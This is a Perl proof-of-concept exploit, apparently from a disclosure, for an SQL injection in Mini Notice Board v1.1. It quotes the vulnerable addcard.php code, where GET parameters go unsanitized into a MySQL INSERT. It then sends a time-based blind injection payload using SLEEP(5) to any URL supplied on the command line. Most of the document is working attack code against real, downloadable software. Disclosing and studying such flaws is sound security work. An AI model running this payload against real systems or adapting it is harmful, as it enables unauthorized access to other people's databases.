#!/usr/bin/perl -w #mininoticeboard_v1.1 SQL Injection Exploit #========================================== #Discovered by N_A , N_A[at]tutanota.com #======================================== #Vendor has been notified #========================= #Description #============ #Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car #or lawnmower or want to provide services, they can simply write a card. #It supports unlimited Regions. #https://sourceforge.net/projects/mininoticeboard/ #Vulnerability #============= #addcard.php: #The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection #$title = $_GET["title"]; #$body = $_GET["body"]; #$contact = $_GET["contact"]; #$address = $_GET["address"]; #$tel = $_GET["tel"]; #$date_day = date("d"); #$date_month = date("m"); #$date_year = date("y"); #$romovalcode = genremovalcode(); #$categorie = $cid; #if($title!="" && $body!="" && $tel!="" && $contact!="") #{ # include 'dbconnect.php'; # $sqlset["tablename"] = $sqlset["tableprefix"].'content'; # mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\', #\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red'; #Proof Of Concept Exploit attached below #N_A, N_A[at]tutanota.com use strict; use LWP::Simple; my ($url) = @ARGV; if( not defined $url ) { print "=========================================\n"; print "Mini Notice Board SQL Injection Exploit\n"; print "\tBy N_A\n"; print "\n"; print "$0 [URL]\n"; print "$0 127.0.0.1/mininoticeboard\n"; print "=========================================\n"; exit; } my $file = '/addcard.php'; #The Vulnerable .php file my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card'; my $request ="http://".$url.$file."?".$injection; #Forming the exploit string my $content = get $request; die "Could not get $request" unless defined $content; #It should hang here for about 5 seconds..... (SLEEP(5)) as per injection print "##########################\n"; print "SQL Injection Successful!\n"; print "##########################\n"